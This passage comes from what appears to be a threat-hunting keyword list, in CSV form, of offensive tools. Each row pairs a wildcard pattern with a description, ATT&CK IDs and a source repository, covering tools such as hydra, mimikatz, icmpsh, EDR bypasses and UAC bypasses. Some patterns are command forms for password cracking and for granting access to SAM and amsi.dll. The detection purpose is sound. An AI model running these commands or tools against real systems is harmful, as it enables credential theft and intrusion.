Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HunnicCyber/SharpDomainSpray*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,1,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*HVNC Server.exe*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*HVNC\ Server*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,0,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*hydra -*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra * ftp://*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra * http-post-form *,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra * mysql://*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra * ssh://*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra * telnet://*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra smtp-enum*,offensive_tool_keyword,thc-hydra,Parallelized login 
cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra.c*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra:x:10001:*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*HYDRA_PROXY_HTTP*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*hydra-cobaltstrike*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*Hyperion PE-Crypter*,offensive_tool_keyword,hyperion,A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds),T1027.002 - T1059.001 - T1116,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://www.kali.org/tools/hyperion/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*hyperion.exe *,offensive_tool_keyword,hyperion,A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. 
The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds),T1027.002 - T1059.001 - T1116,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://www.kali.org/tools/hyperion/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*hyperion_2.0.orig.tar.gz*,offensive_tool_keyword,hyperion,A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds),T1027.002 - T1059.001 - T1116,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://www.kali.org/tools/hyperion/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Hypnos-main.zip*,offensive_tool_keyword,Hypnos,indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections,T1055.012 - T1136.001 - T1070.004 - T1055.001,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/CaptainNox/Hypnos,1,1,N/A,10,1,49,5,2023-08-22T20:17:31Z,2023-07-11T09:07:10Z -*hypobrychium.exe*,offensive_tool_keyword,hypobrychium,hypobrychium AV/EDR Bypass,T1562.001 - T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/foxlox/hypobrychium,1,1,N/A,8,1,72,21,2023-07-21T21:13:20Z,2023-07-18T09:55:07Z -*hypobrychium-main*,offensive_tool_keyword,hypobrychium,hypobrychium AV/EDR Bypass,T1562.001 - T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/foxlox/hypobrychium,1,1,N/A,8,1,72,21,2023-07-21T21:13:20Z,2023-07-18T09:55:07Z -*i2pinstall*,offensive_tool_keyword,I2P,I2P - The Invisible Internet Project.,T1048.001 - T1568.003,TA0011 - TA0040,N/A,N/A,Data Exfiltration,https://geti2p.net/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*iam__enum_assume_role/default-word-list.txt*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z 
-*iAmAnIndependentStrongPassswordThatNeedsToBeSecure*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*iammaguire/Gotato*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,1,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*ibmiscanner2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*IBurpExtender.java*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*IBurpExtenderCallbacks.java*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0010 - TA0007 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -"*icacls ""C:\windows\system32\config\SAM"" /grant*",greyware_tool_keyword,icalcs,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*icacls.exe C:\Windows\System32\amsi.dll /grant administrators:F*,greyware_tool_keyword,icalcs,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin,1,0,N/A,10,8,N/A,N/A,N/A,N/A -*icebreaker:P@ssword123456*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*icebreaker-master.zip*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*icebreaker-scan.xml*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*IcebreakerSecurity/DelegationBOF*,offensive_tool_keyword,cobaltstrike,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 
- T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/DelegationBOF,1,1,N/A,10,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*IcebreakerSecurity/DelegationBOF*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. 
and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,1,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*IcebreakerSecurity/PersistBOF*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*ice-wzl/wmiexec2*,offensive_tool_keyword,wmiexec2,wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*ICMP-ReceiveFile.py*,offensive_tool_keyword,ICMP-TransferTools,Transfer files to and from a Windows host via ICMP in restricted network environments.,T1041 - T1001 - T1105 - T1205,TA0005 - TA0001 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/icyguider/ICMP-TransferTools,1,1,N/A,N/A,3,285,57,2022-01-27T16:53:44Z,2022-01-27T16:50:13Z -*Icmp-Redirect.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*ICMP-SendFile.py*,offensive_tool_keyword,ICMP-TransferTools,Transfer files to and from a Windows host via ICMP in restricted network environments.,T1041 - T1001 - T1105 - T1205,TA0005 - TA0001 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/icyguider/ICMP-TransferTools,1,1,N/A,N/A,3,285,57,2022-01-27T16:53:44Z,2022-01-27T16:50:13Z -*icmpsh.exe*,offensive_tool_keyword,icmpsh,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/r00t-3xp10it/venom,1,1,N/A,10,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*icmpsh.exe*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*icmpsh.git*,offensive_tool_keyword,icmpsh,Simple reverse ICMP shell,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010,N/A,N/A,C2,https://github.com/bdamele/icmpsh,1,1,N/A,10,10,1475,424,2018-04-06T17:15:44Z,2011-04-15T10:04:12Z -*icmpsh_m.py*,offensive_tool_keyword,icmpsh,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/r00t-3xp10it/venom,1,1,N/A,10,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*icmpsh_m.py*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*icmpsh-m.*,offensive_tool_keyword,icmpsh,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/r00t-3xp10it/venom,1,1,N/A,10,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*icmpsh-m.c*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*icmpsh-m.pl*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*icmpsh-master*,offensive_tool_keyword,icmpsh,Simple reverse ICMP shell,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/bdamele/icmpsh,1,1,N/A,10,10,1475,424,2018-04-06T17:15:44Z,2011-04-15T10:04:12Z -*icmpsh-s.*,offensive_tool_keyword,icmpsh,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010,N/A,N/A,C2,https://github.com/r00t-3xp10it/venom,1,1,N/A,10,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*icmptunnel*,offensive_tool_keyword,icmptunnel,icmptunnel works by encapsulating your IP traffic in ICMP echo packets and sending them to your own proxy server. The proxy server decapsulates the packet and forwards the IP traffic. The incoming IP packets which are destined for the client are again encapsulated in ICMP reply packets and sent back to the client. The IP traffic is sent in the 'data' field of ICMP packets.,T1041 - T1001 - T1570,TA0011,N/A,N/A,Defense Evasion,https://github.com/s-h-3-l-l/katoolin3,1,0,N/A,N/A,4,315,103,2020-08-05T17:21:00Z,2019-09-05T13:14:46Z -*icyguider/LightsOut*,offensive_tool_keyword,LightsOut,Generate an obfuscated DLL that will disable AMSI & ETW,T1027.003 - T1059.001 - T1082,TA0005 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/icyguider/LightsOut,1,1,N/A,N/A,3,243,29,2023-06-09T10:39:36Z,2023-06-01T14:57:44Z -*id::modify*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*IDiagnosticProfileUAC.git*,offensive_tool_keyword,IDiagnosticProfileUAC,UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl,T1548.002 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/Wh04m1001/IDiagnosticProfileUAC,1,1,N/A,10,2,173,32,2022-07-02T20:31:47Z,2022-07-02T19:55:42Z -*IDiagnosticProfileUAC-main*,offensive_tool_keyword,IDiagnosticProfileUAC,UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl,T1548.002 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/Wh04m1001/IDiagnosticProfileUAC,1,1,N/A,10,2,173,32,2022-07-02T20:31:47Z,2022-07-02T19:55:42Z -*Idov31/Jormungandr*,offensive_tool_keyword,Jormungandr,Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel,T1215 - T1059.003 - T1547.006,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Idov31/Jormungandr,1,1,N/A,N/A,3,203,23,2023-09-26T18:06:53Z,2023-06-25T06:24:16Z -*idrac_default_pass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*idrac_default_user.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*IDSyscall.exe*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*IDSyscall.sln*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*IDSyscall.vcxproj*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*IDSyscall/IDSyscall*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*IDSyscall\IDSyscall*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using 
Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,0,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*ie_execcommand_uaf.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ie_win_fakenotification-clippy*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*ie_win_htapowershell.*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*ie_win_missingflash-prettytheft*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*IERMTCBpbnRvIHByb2Nlc3MgOiA=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*if [ -f /tmp/tmpwatch ] * then*,greyware_tool_keyword,tmpwatch,Equation Group hack tool set command exploitation- tmpwatch - removes files 
